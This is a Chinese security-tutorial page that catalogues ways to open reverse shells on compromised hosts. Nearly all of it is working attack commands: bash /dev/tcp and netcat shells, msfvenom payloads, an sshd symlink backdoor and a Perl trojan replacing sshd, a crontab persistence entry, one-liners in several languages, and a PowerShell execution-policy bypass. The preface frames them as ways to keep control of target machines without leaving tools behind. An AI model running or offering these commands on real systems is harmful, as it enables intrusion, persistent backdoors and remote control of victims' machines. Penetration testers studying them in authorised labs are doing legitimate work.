> For the complete documentation index, see [llms.txt](https://ninjia.gitbook.io/secskill/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ninjia.gitbook.io/secskill/net/shell.md). # 4.2 反弹shell的N种姿势 ## 前言 很多时候,不到万不得已的情况下,我们完全没必要非往目标机器里传一堆工具,先不说由于各种防护\[不仅仅是杀软的问题],传工具困难重重,有时由于自己的粗心,走的时候很容易把各种工具落在目标机器上,万一哪天被人看见,一看工具就大概知道你上来都干了啥,尤其是很多小伙伴在用别人工具时候也不爱做点儿什么手脚,后果你自然是很懂的,嘿嘿……其实,我一直都建议,如果能利用目标系统自身的环境或者工具帮我们搞定的,最好就直接用那个,也省去了不少的麻烦,比如,最简单的,利用目标系统中自带的各种工具及语言环境帮我们弹回一个简单的可交互shell, 有shell,’夫何求’, 没错,你肯定会说,不就一个shell嘛,我直接用 coablt strike & msf 岂不更好,嘿嘿……其实,这里并不存在争论的点,不错,它俩确实挺好,不过,恶劣的环境总是有的,有时想把它俩用上确实比较费劲,好了,前戏就到此为止吧,下面我们就直奔主题…… 实验环境: 主机A:10.1.1.100 主机B:10.1.1.101 ## bash 在主机A使用nc监听 ,命令:nc -lvvp 123 在主机B上使用bash直接反弹,命令:bash -i >& /dev/tcp/10.1.1.100/123 0>&1 此时主机A收到shell了 ![](http://ww1.sinaimg.cn/large/0065jC22ly1g114146yv5j30mg0b3n0t.jpg) 下面来解释一下这一条反弹shell的命令首先,bash -i代表在本地打开一个bash,然后就是/dev/tcp/ip/port, /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,>&后面跟上/dev/tcp/ip/port这个文件代表将标准输出和标准错误输出重定向到这个文件,也就是传递到远程上,如果远程开启了对应的端口去监听,就会接收到这个bash的标准输出和标准错误输出。 ### 方法2 ``` bash -i >& /dev/tcp/attackerip/attackerport 0<&2 ``` ### 方法3 ``` exec 5<>/dev/tcp/attackerip/attackerport;cat <&5|while read line;do $line >&5 2>&1;done ``` ![](http://ww1.sinaimg.cn/large/0065jC22ly1g11arjryogj30m604b0uv.jpg) ``` 0<&196;exec 196<>/dev/tcp/attackerip/attackerport; sh <&196 >&196 2>&196 ``` 与上一个完全相同 ## nc 攻击机上执行 ``` nc -lvvp 1234 ``` 靶机执行 ``` nc 10.1.1.100 1234 -t -e /bin/bash ``` ![](http://ww1.sinaimg.cn/large/0065jC22ly1g11axuba4pj30lf03nmxz.jpg) 没有-e选项时: ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.1.1.100 2333 >/tmp/f ``` 或者 ``` mknod backpipe p; nc 10.1.1.100 2333 0backpipe 2>backpipe ``` ## msfvenom 搜索相关payload ``` msfvenom -l payloads | grep 'cmd/unix/reverse' ``` 里面自习选择即可,这里以python的为例 命令: ``` msfvenom -p cmd/unix/reverse_python lhost=10.1.1.100 lport=1234 ``` ![](http://ww1.sinaimg.cn/large/0065jC22ly1g11b6r5tubj30m907fdkf.jpg) 然后主机A上启动nc进行监听 切换到主机B,在终端输入msfvenom给出的payload ![](http://ww1.sinaimg.cn/large/0065jC22ly1g11b7qh1c3j30je0350up.jpg) 执行即可反弹shell ## sshd 目标机器执行 ``` netstat -tulnp | grep "8080" ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8080; netstat -tulnp | grep "8080" ``` 攻击机执行 ``` ssh root@192.168.1.129 -p 8080 一定要注意在自己本地机器上用这个端口去连 pkill su ``` ![](http://ww1.sinaimg.cn/large/0065jC22ly1g11bf0tytjj30ou08a405.jpg) ### socat版 ``` cd /usr/sbin/ mv sshd ../bin/ echo '#!/usr/bin/perl' >sshd echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd chmod u+x sshd /etc/init.d/sshd restart ``` 攻击机执行: ``` socat STDIO TCP4:10.1.1.101:22,sourceport=13377 ``` ## awk 目标机执行 ``` awk 'BEGIN{s="/inet/tcp/0/192.168.1.128/8080";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' ``` 攻击机nc监听即可 ## telnet ### 第一种 ``` C:\>nc -vlp 1080 命令结果显示窗口 C:\>nc -lvp 6666 命令传输窗口 # telnet 10.1.1.101 6666 | /bin/bash | telnet 10.1.1.101 1080 ``` ![](http://ww1.sinaimg.cn/large/0065jC22ly1g11doc9l8bj30ly070dhf.jpg) ![](http://ww1.sinaimg.cn/large/0065jC22ly1g11dosmgwgj30q20di7aw.jpg) ### 第二种 ``` C:\>nc -lvp 8080 # mknod test p && telnet 10.1.1.101 8080 0test ``` ## 各类语言 ### perl ``` C:\>nc -lvp 53 # perl -e 'use Socket;$i="10.1.1.101";$p=53;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ``` ### python ``` C:\>nc -lvp 8080 # python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.1.1.101",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' ``` ### crontab ``` C:\>nc -lvp 8080 # (crontab -l;printf "* * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.1.1.101\",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n")|crontab - # crontab -e ``` ### php ``` C:\>nc -lvp 8080 # /usr/local/php/bin/php -r '$sock=fsockopen("10.1.1.101",8080);exec("/bin/bash -i <&3 >&3 2>&3");' ``` ### ruby ``` C:\>nc -lvp 8080 # ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.128","8080");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ``` ### lua ``` c:\nc -lvp 8080 # apt-get install lua50 -y # apt-get install luarocks -y # luarocks install luasocket # lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.1.1.101','8080');os.execute('/bin/sh -i <&3 >&3 2>&3');" ``` ## 协议 ### icmp ``` # make linux # ./ishd -i 6555 -t 0 -p 8080 # ./ish -i 6555 -t 0 -p 8080 10.1.1.101[这里的ip可以换成域名] ``` ### udp ``` C:\>nc -l -p 53 -u 注意这里务必要用udp的模式来接 # python udpshell.py 10.1.1.101 53 udp ``` ## powershell ``` C:\>nc -lvp 8080 # powershell –exec bypass –Command "& {Import-Module 'C:\mini-reverse.ps1'}" PS C:\> Set-ExecutionPolicy Unrestricted PS C:\> cd .\powercat PS C:\powercat> Import-Module .\powercat.ps1 PS C:\powercat> powercat -c ip -p 8080 -e cmd -g >> payload.ps1 C:\>nc -lvp 8080 powershell –exec bypass –Command "& {Import-Module 'C:\payload.ps1'}" ``` ## 基础链接 --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ninjia.gitbook.io/secskill/net/shell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.